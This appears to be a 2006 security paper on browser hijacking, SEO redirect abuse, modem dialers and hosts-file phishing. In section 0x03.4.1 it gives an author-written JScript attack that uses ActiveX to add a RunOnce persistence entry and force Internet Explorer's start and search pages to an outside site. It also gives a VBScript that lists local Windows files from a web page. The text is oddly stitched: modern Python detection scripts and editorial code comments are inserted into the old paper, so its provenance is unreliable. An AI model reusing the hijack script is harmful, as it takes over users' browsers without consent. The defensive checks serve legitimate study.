HijackArt.txt
Posted Apr 28, 2006
Authored by AdityaSood

Defacing The Art Of Hijacking Spamming And EMail Viruses - A paper analyzing the methodology of hijacking a user's web browser, focusing mainly on Internet Explorer.

tags | advisory, web
SHA-256 | a19d8c74cf6da99ca80f6b3a1494254c3e49702f0a7e4c81583dd174eeb52bf6




0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0
[Defacing The Art Of Hijacking, Spamming And EMail Viruses]
0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0


[HIJACKERS ART]
[Internet Phenomenon]

RXLabs::Digital Intelligence
http://www.RxLabs.MetaEye.Org
(C) CopyRight

ZeroKnock@MetaEye.org
Aditya@Securitywonks.org





Knowledge Engine Undertaken As:-

Part A
======

[0x01] Abstract.
[0x02] The Methodology Of Hijackers And Virus Writers.
[0x02.1] Example:-SurfbarA
[0x03] Unveiling Hijacking:-
[0x03.1] Techniques.
[0x03.1.1] URL Hijacking.
[0x03.1.2] Redirect Hijacking.
[0x03.1.3] Meta Refreshing Hijacking.
[0x03.1.4] Server Side 302 Redirect in .htaccess
[0x03.1.5] No Follow Hit.
[0x03.1.6] Frame Capturing.
[0x03.1.7] Business Name And URL Hits.
[0x03.1.8] Bad Links Set Up:Domain Splitting
[0x03.2] Modem Hijacking.
[0x03.3] Active X Phishing Hijacking.
[0x03.4] Web Page Hijacking.
[0x03.4.1] Example:-Javascript By:-ZeroKnock
[0x03.5] 302 Redirect Stuffing Hit-Traffic Stealing.

[0x04] How Hijackers Infect The MailBox[Outlook Express]


Part B
======

[0x01] Undertaking HTML Security Tests.
[0x01.1] HTML Security Test Code Snippet.

[0x02] Checking For The Hijacking Of Websites.
[0x02.1] Site Stuffing.
[0x02.2] URL Stuffing.
[0x02.3] Link Stuffing.
[0x02.4] Site Meter Stuffing.

[0x03] Conclusion.

[0x01] Abstract:

Hijacking is a very common phenomenon nowadays, and it relates closely to browser
manipulation. I have gone through this kind of material many times and have seen how
this art subverts the normal functioning of the web browser, hitting mainly INTERNET EXPLORER.


Internet Explorer is nowadays the subject of many vulnerabilities. Microsoft
manages to fix them, but the process has a very unpleasant effect on day-to-day work
in the technology world.



[0x02] The Methodology Of Hijackers And Virus Writers:-
=======================================================




Step(A)

Email Spamming:-
---------------
It relates to the art of manipulating emails so that misleading content is
sent with them, whether greeting cards, porn links, executables, trojans, etc.


Step(B)

Exe Hitting:-
-------------
It means copying executable files onto the target system, into any
system folder such as [System/System32] on Windows platforms.



Step(C)
Planting Trojans:-
------------------
It relates to setting up trojan servers on the target system
for the remote execution of commands.


Step(D)

Vulnerability Hit:-
-------------------
It relates to the exploitation of a known vulnerability
of the browser.


Step(E)

Registry Hit:-
--------------
It relates to manipulation of the registry keys so that they
reference the program designed for execution.

Step(F)

At Last The SYSTEM Gets SUCKED!
===============================



Example:- Presenting You An Example Of Surfbar.A:-
=================================================


Surfbar.A drops the DRG.EXE file onto the C: drive and runs it.

The DRG.EXE file attempts to download a file called SURFERBAR.DLL from the Internet
and puts it in the 'C:\Program Files\' folder under the name WIN32.DLL. This file is
then registered with Windows using the RegSvr32.exe utility.

The WIN32.DLL file is an Internet Explorer plugin. It provides customized search
capabilities and can also be classified as adware. This adware drops a file
called WINSRV32.EXE into the 'C:\Program Files\' folder.

The WINSRV32.EXE file stays in memory and every 10 seconds does the following:

1. Refreshes the ITBarLayout value in the following registry key:

[HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]

2. Changes the IE start page to the 'www.surferbar.com' website

3. Constantly re-creates the following registry value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\runonce]
"win32" = "c:\\program files\\winsrv32.exe"

These actions make the installed adware hard to remove from a system, which is
why the WINSRV32.EXE file is classified as a trojan.



[0x03] Unveiling Web Page Hijacking:-
=====================================

This relates to browser hacking. It actually means the hacker manipulates
the system registry settings or browser settings, which after some time
start malfunctioning, i.e. the wrong site opens, porn is generated, unhandled
popups appear, etc.

I used to see a lot of unwanted stuff of this kind, and from my side I have done
browser hijacking a lot. The main motive behind this is that you craft some
dirty code which gets repulsive as soon as you download the attachment in the mail;
it adheres to the system files and after some time starts penetrating, whether
we call it a virus or a manipulator or whatsoever.



[0x03.1] Techniques:-
=====================

[0x03.1.1] URL Hijacking:-
==========================

URL hijacking seems to be a very fruitful way of hijacking. In this, a single URL
is manipulated and redirected to another URL, which results in hijacking
on the fly.

Check The URL:-
www.Hijacker'sDomainName.com/tracker2.php?
url=http://www.YourOwnDomainName.comHere/YourOwnPageURLHere.html


The tracker2.php? in the URL above is the culprit here. It is a click-tracking
script often used by affiliate sites to track clicks. If anyone clicks on that
link it will first go to the offender's page and then quickly revert to your own
page. However, this script often uses a 302 redirect, which causes Google to think
your page has been temporarily moved to the other site, and it gives the PR to that
site, thus increasing their rank and reducing yours. If it is your home page that
was affected it is a very serious matter, because the home page PR provides rank
for the rest of your website (Google started removing the PHP tracker links from the
site: command results in early 2005, so this is less of a problem than it was earlier).




[0x03.1.2] Redirect Hijacking:-
===============================

This is another way of hijacking, similar to the URL one but with a little difference.
In this the input value of the site parameter is changed to the hijacker's choice, and the
result is linked to the site the hijacker wants to display as soon as the link is
opened.

http://www.<sitename.com>/site.PHP?site=<Manipulated Site Name>
http://www.kickass.net/site.PHP?site="http://www.Hijacked.net"

As one can clearly see, the redirection is possible whenever the domain is under the
hijacker's control. If you think of using an ID number, that is fine too, because if you
refresh the page it moves so fast that it won't display, but that does not mean the site
won't be redirected.


[0x03.1.3] Meta Refreshing:-
============================

This is yet another way of hijacking. In this case
the URL will sometimes look innocent but will go to the dishonest site, and there
will be code on that site that redirects to your site with a Meta Refresh tag
(automatically redirecting the browser to your site). The Meta Refresh is a favorite
of spammers, so search engines are starting to ban sites using them. To see if a site
is using a Meta Refresh, view the code by clicking on View/Source in your browser
menu and see if there are any meta refresh tags in the code at the top of that page.
Look for a meta refresh tag set for "0" seconds that is redirecting to your site,
similar to the following:

<meta http-equiv="refresh" content="0; url=http://www.<SiteName>">


[0x03.1.4] Server Side 302 Redirect .htaccess:-
===============================================

A hijacker may also use a server-side 302 redirect in an .htaccess file
telling the server to redirect to your site. A 302 redirect tells the search
engine their site, or page, has moved temporarily to your site and to credit the
content of your site to their site, thus stealing your PR. Many directories use
302 redirects on the links in their directory to track clicks; however, it results
in the same problem, because Google is attributing those links to your site and
stealing your PR. You can't tell this is a 302 redirect by just viewing the URL;
you need to copy the link into a server header checker. If the results show this
link is a 302 redirect then the directory may be stealing your page rank. If it
shows a 200, then the page is probably OK (if this check produces an error, make
sure there are no breaks in the link).
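The header check described here and the meta refresh inspection from 0x03.1.3 can be done by one small script. This is an added example, not code from the paper: it classifies a raw HTTP response as a 302 hijack, a zero-second meta refresh hijack, or clean, given the domain you want protected (the sample responses are constructed and use the paper's placeholder domain).

```python
"""Link checker for 0x03.1.3 (zero-second meta refresh) and 0x03.1.4 (server-side
302). Added example, not from the paper; the responses below are constructed."""
import re
from urllib.parse import urlparse

META_TAG = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
REFRESH_CONTENT = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*(\S+)", re.IGNORECASE)

def same_site(url: str, my_domain: str) -> bool:
    """Hostname comparison that ignores a leading 'www.' (cf. 0x03.1.8)."""
    strip = lambda h: h[4:] if h.startswith("www.") else h
    host = (urlparse(url).hostname or "").lower()
    return strip(host) == strip(my_domain.lower())

def split_response(raw: str):
    """(status code, lowercase header dict, body) from a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body

def meta_refresh_targets(html: str):
    """Yield (delay seconds, url) for every meta refresh tag, any attribute order."""
    for tag in META_TAG.finditer(html):
        attrs = {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
                 for m in ATTR.finditer(tag.group(0))}
        if attrs.get("http-equiv", "").lower() != "refresh":
            continue
        m = REFRESH_CONTENT.match(attrs.get("content", ""))
        if m:
            yield int(m.group(1)), m.group(2).strip("'\"")

def classify_link(raw_response: str, my_domain: str) -> str:
    """'302-hijack': temporary redirect whose Location is my site (the case the
    paper says credits my PR to the redirecting site); 'meta-hijack': a 200 page
    that meta-refreshes to my site after 0 s; 'ok': anything else, incl. a 301."""
    status, headers, body = split_response(raw_response)
    if status in (302, 307) and same_site(headers.get("location", ""), my_domain):
        return "302-hijack"
    if status == 200 and any(delay == 0 and same_site(url, my_domain)
                             for delay, url in meta_refresh_targets(body)):
        return "meta-hijack"
    return "ok"

# Constructed samples using the paper's placeholder domain.
SAMPLE_302 = ("HTTP/1.1 302 Found\r\n"
              "Location: http://www.YourOwnDomainName.com/YourOwnPageURLHere.html\r\n"
              "Content-Length: 0\r\n\r\n")
SAMPLE_META = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
               "<html><head><meta content='0; url=http://YourOwnDomainName.com/'"
               " http-equiv=\"refresh\"></head></html>")
SAMPLE_OK = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             "<html><body><a href='http://www.YourOwnDomainName.com/'>x</a></body></html>")
```

Feed it the raw response of a suspect directory link (fetched without following redirects) and your own domain; a 301 is reported as ok because a permanent move does not credit the redirecting site.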


[0x03.1.5] No Follow Hit:-
============================

A dishonest site that has agreed to trade links with you that has a desire
to lessen outgoing links on their site (to boost their own PR) will sometimes
place a rel="nofollow" in the link itself. This prevents search engines from
following that link. So while it appears that site has linked to your site the
search engines won't benefit your site for the PR it could have gained so check
all reciprocated links carefully for that little bit of code (run your mouse over
the link and check it in the bottom of your browser window).


[0x03.1.6] Frame Capturing:-
============================

Another method that dishonest webmasters use to benefit their own site and
provide no benefit to your own site is to allow you to submit your site but
then they install a code that draws your whole web page (including images and
working links) into a frame so your whole web page is displayed on their
site. This is dishonest because you think they are going to link to your site
but what they are actually doing is using your design and content and displaying
it as their own without your permission. This also steals traffic from your site
because people often see what they wanted to see on the hijacker's site without
even visiting your site.

You also get no benefit of the PR from that link because the link is inside a frame
on their site which most search engines can't read but for those search engines
that can read what is inside frames your site may be penalized for duplicate content
(this can result in "Supplemental Results" being tagged on the end of your listing
in the search engines).

HijackersWebSiteURLgoeshere/opensite.cfm?site=www.YourWebSiteURLGoesHere.com
(and your ID number goes here: ID=____, etc.)


Check Out A Little Script (frame-busting: if this page is loaded inside a frame,
it replaces the top-level document with itself).

<script type="text/javascript">
// "top" is the outermost window; "self" is this page. If they differ, we are framed.
if (top != self) top.location.href = self.location.href;
</script>




[0x03.1.7] Business Conventions And URLs:-
==========================================

Often directories, now called Scraper Directories (that you may have submitted
to yourself), will take your page (if it's ranking well in the search engines)
and set up a separate page with your business name in the title and/or your URL,
and also the most important text on your page that brings keyword rank to your
site. This is blatant content theft, and it results in them competing with
your site for your own business.




[0x03.1.8] Bad Links SetUP:- Domain Splitting
=============================================

If you have submitted your site to search engines as www.YourDomain.com and someone
links to your site with just YourDomain.com, i.e. without the WWW in front, Google
will think you have two sites under the same domain and credit you with a duplicate
content penalty (Supplemental Results). This is known as Splitting your Domain.






[0x03.2] Modem Hijacking:-
==========================

Modem hijacking, also referred to as dialer hijacking or Internet dumping, is a
form of fraud that targets dial-up modem users. The scam itself isn't new, but many
Internet users may not be aware of it or know how to avoid it.

Internet users may run into a pop-up or Web page that offers access to a particular
site or various files. Sometimes the Web site may call this a viewer indicating
that you need to download it in order to "view" the content on the site. When the
user clicks 'OK' or agrees to the terms on the pop-up to gain access, scammers can
use ActiveX scripts to download a dialer to the computer with or without the user's
knowledge.

Once the dialer has been downloaded and installed onto the user's computer, it can
drop the user from the dial-up session through his or her ISP and then proceed to
dial a long distance telephone number without the user's knowledge. Other forms of
the dialer may automatically connect to a long distance number while the user's
computer is in an idle state.

These are often international calls and can cost several dollars per minute. As
a result, the user ends up with an unexpected, exorbitant charge on his or her long
distance bill.


[0x03.3] Active X Phishing Hijacking:-
======================================

This type of phishing scam uses a Trojan program which disguises itself as a
legitimate program, but once executed, destroys or scrambles data. The Trojan
arrives in HTML email or can be run on a normal looking Web page. If you have
enabled scripting on your computer (Internet Explorer and Microsoft's Outlook and
Outlook Express email programs enable scripting by default) and you have ActiveX
security settings configured too low (or you are running an out-of-date and/or
unpatched version of Windows), the Trojan installs itself on your computer.

The Trojan then makes changes to the hosts file, a component of Windows that your
browser first looks to when it converts a domain name that you enter (such
as "www.earthlink.net") into the IP address it needs to load a Web page.

By entering an IP address of the phisher's choosing into your hosts file and
associating it with the names of well known Web sites, the phisher can force your
browser -- any browser, not just Internet Explorer -- to go to a fake Web site that
may look like your favorite Web site, but isn't. When you log on, the Phisher will
capture your username and password.

Under normal circumstances, most people do not have any IP addresses listed in their
hosts file, but the file exists just in case you might need to use it. Since most
PC users are unfamiliar with the workings of the hosts file, unless you're running
special software that monitors the hosts file for changes, you may never know it
has been changed until it's too late.
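The "special software that monitors the hosts file for changes" mentioned above does not have to be special. The following is an added example, not from the paper: it parses a hosts file, flags any name resolved away from loopback (the exact change the phisher makes), and diffs the current file against a baseline snapshot. The hosts text is constructed; 192.0.2.10 is a TEST-NET address standing in for the phisher's server.

```python
"""Hosts-file check for the ActiveX phishing hijack above: flags names resolved
away from loopback and reports changes against a saved baseline. Added example,
not from the paper; the hosts text below is constructed, not a real capture."""
import ipaddress
import os

# Location of the hosts file the browser consults before DNS.
HOSTS_PATH = (r"C:\Windows\System32\drivers\etc\hosts" if os.name == "nt"
              else "/etc/hosts")

def parse_hosts(text: str) -> dict:
    """Map lowercase hostname -> address; comments and blank lines are skipped
    and the first entry for a name is kept."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping.setdefault(name.lower(), ip)
    return mapping

def suspicious_entries(mapping: dict) -> dict:
    """Entries that send a name somewhere other than loopback/unspecified.
    That is what the phisher needs (e.g. 'www.earthlink.net' -> his server);
    ad-blocking entries pointing at 127.0.0.1 or 0.0.0.0 are left alone."""
    flagged = {}
    for name, ip in mapping.items():
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            flagged[name] = ip              # unparsable address: report it too
            continue
        if not (addr.is_loopback or addr.is_unspecified):
            flagged[name] = ip
    return flagged

def hosts_changes(baseline: dict, current: dict):
    """(added, changed, removed) between two parsed snapshots; run this on a
    schedule against a baseline taken when the machine was known clean."""
    added = {n: ip for n, ip in current.items() if n not in baseline}
    changed = {n: (baseline[n], ip) for n, ip in current.items()
               if n in baseline and baseline[n] != ip}
    removed = {n: ip for n, ip in baseline.items() if n not in current}
    return added, changed, removed

def load_hosts(path: str = HOSTS_PATH) -> dict:
    """Parse the live hosts file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return parse_hosts(fh.read())

# Constructed samples: a clean baseline and a tampered file that maps the
# paper's example domain to a TEST-NET address standing in for the phisher.
BASELINE = "127.0.0.1 localhost\n::1 localhost\n"
TAMPERED = """# hosts file after the trojan has run
127.0.0.1  localhost
::1        localhost
0.0.0.0    ads.example            # ad-blocking entry, harmless
192.0.2.10 www.earthlink.net earthlink.net
"""
```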


[0x03.4] Web Page Hijacking:-
=============================

This relates to how a web page is hijacked, since I have undergone a lot of this. Here
I am providing you with a script, written by me, which hijacks the browser
and permanently sets the page to BlackHat.com.

[0x03.4.1] Example:- Javascript By:- ZeroKnock
==============================================

Check:-
# Script Written By Zeroknock
#############################
<script language="JavaScript">
<!--
// JScript run by IE with ActiveX scripting allowed: every line below is a
// registry write that a hijack check should look for.
var Hijack_URL = "http://www.BlackHat.com/main.html";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);                   // 0 = the Windows folder
var filepath = tfolder + "\\" + "exe or js filename";    // placeholder name kept from the original
var Shell = new ActiveXObject("WScript.Shell");
// the original wrote "Set A=" (VBScript syntax), which JScript rejects
var A = "HKCU\\Software\\Microsoft\\Internet Explorer";
// persistence: the dropped file is run once at the next logon
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\xxx", filepath);

// start, local and search pages all forced to Hijack_URL (the original quoted
// the literal string "A" instead of concatenating the variable)
Shell.RegWrite(A + "\\Main\\StartPage", Hijack_URL);

Shell.RegWrite(A + "\\Main\\LocalPage", Hijack_URL);

Shell.RegWrite(A + "\\Main\\SearchPage", Hijack_URL);

Shell.RegWrite(A + "\\Main\\Use SearchAsst", "no");

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL", 1, "REG_DWORD");
-->
</script>

It is so easy to write code if you know the defined characteristics of the system.
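Both the Surfbar.A write-up and the script above leave their traces in the same two places: the IE Main page values and an autostart (RunOnce) entry. The following added example (not the paper's code) audits a `reg export` text for exactly those traces; the export is constructed from the values the paper lists, and the allowed home-page hosts are an assumption you supply.

```python
"""Audit of a .reg export for the persistence described in the Surfbar.A
write-up and the IE page values the script above rewrites. Added example, not
from the paper; the export text below is constructed."""
import re
from urllib.parse import urlparse

KEY_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]*)"\s*=\s*(.*)$')
# IE page values a hijacker rewrites. Real IE names carry a space ("Start
# Page"); the paper's script writes them without one, so compare spaceless.
PAGE_VALUES = {"startpage", "localpage", "searchpage", "defaultpage"}

def parse_reg(text: str) -> dict:
    """Map key path -> {value name: value}. Decodes quoted strings (doubled
    backslashes, escaped quotes) and dword values; other types are kept raw,
    the @ default value is skipped."""
    reg, key = {}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            reg.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            raw = m.group(2).strip()
            if raw.startswith('"') and raw.endswith('"'):
                val = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            elif raw.lower().startswith("dword:"):
                val = int(raw[6:], 16)
            else:
                val = raw
            reg[key][m.group(1)] = val
    return reg

def audit(reg: dict, expected_hosts: set) -> list:
    """Findings: IE page values whose host is not one you chose, and every
    Run/RunOnce entry (RunOnce is normally empty; Surfbar.A re-creates its
    entry every 10 seconds, so it is always present in an export)."""
    findings = []
    for key, values in reg.items():
        leaf = key.rsplit("\\", 1)[-1].lower()
        if key.lower().endswith("\\internet explorer\\main"):
            for name, val in values.items():
                if name.replace(" ", "").lower() in PAGE_VALUES:
                    host = (urlparse(str(val)).hostname or "").lower()
                    # no host means a local file such as blank.htm: allowed
                    if host and host not in expected_hosts:
                        findings.append(f"IE {name} points to {host!r}: {val}")
        if leaf in ("run", "runonce"):
            for name, val in values.items():
                findings.append(f"autostart {leaf} entry '{name}' = {val}")
    return findings

# Constructed export reproducing the values the paper lists for Surfbar.A.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.surferbar.com/"
"Use Custom Search URL"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"win32"="c:\\program files\\winsrv32.exe"
'''
```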


[0x03.5] 302 Redirect Stuffing : Traffic Stealing:-
====================================================

This is quite different. The hijackers inject a 302-redirecting web page to steal traffic from
your website. What happens is that all the incoming traffic appears to go to the
hijacker-defined web page. The hijackers take the benefit your site has earned, i.e. the
rank the search engine has endorsed you with, and in some cases you yourself can be penalised
for using a 302 redirect web page. So this is considered a basic problem.



Part B
======


[0x01] Performing HTML Security Tests:-
=======================================

In this section I am going to explain HyperText Markup Language security
tests. This test relates to uncovering a bug, if one is found, in the language during the
coding of the web page.

[0x01.1] The Code Scenario:-
============================

HTML Security Test :::: [*]ZeroKnock[*]
This is basically designed to check the effect of ActiveX controls. If an alert occurs, then the
system is under security treatment, but at the same time [*]scrrun.dll[*] is present, showing a
vulnerability in the engine.
<script language="VBScript">
<!--
' Creates the Scripting Runtime (scrrun.dll) FileSystemObject from a web page.
' A hardened IE refuses or prompts before creating the control; if the file
' listing below appears, the page was allowed to read the local disk.
Dim FSO, fFolder, fFiles, file_instance

Set FSO = CreateObject("Scripting.FileSystemObject")
Set fFolder = FSO.GetFolder("c:\Winnt")   ' Windows folder on NT/2000; c:\Windows on XP
Set fFiles = fFolder.Files

For Each file_instance In fFiles
    document.writeln file_instance.Name & "<br>"
Next
-->
</script>





[0x02] Checking For The Hijacking Of Websites:-
===============================================

This section relates entirely to checking whether one's web page has been hijacked
or not. This is divided into four defined techniques used to check this.


[0x02.1] Site Stuffing:-
========================

String: site:www.Domain.com in Google.
This technique is used to check the availability of one's web pages in the Google
search engine; it shows the web pages of one's website. Google recently disabled
the occurrence of 302-redirected web pages in these results.


[0x02.2] URL Stuffing:-
=======================

String: allinurl:www.domain.com
This search shows the pages of your website and the links that are provided in your
pages. There is a possibility that redirected pages may contain link-tracking codes,
which may or may not be 302 redirects.

[0x02.3] Link Stuffing:-
========================

String: link:www.Domain.com
This brings up all the links pointing to your site, along with any necessary or
unnecessary 302 redirects.

[0x02.4] Site Meter Stuffing:-
==============================

This relates to a good site meter that provides referral links to your site. This is done to
ensure flexibility in web penetration testing.




[0x03] Conclusion : No Patch For Ignorance.
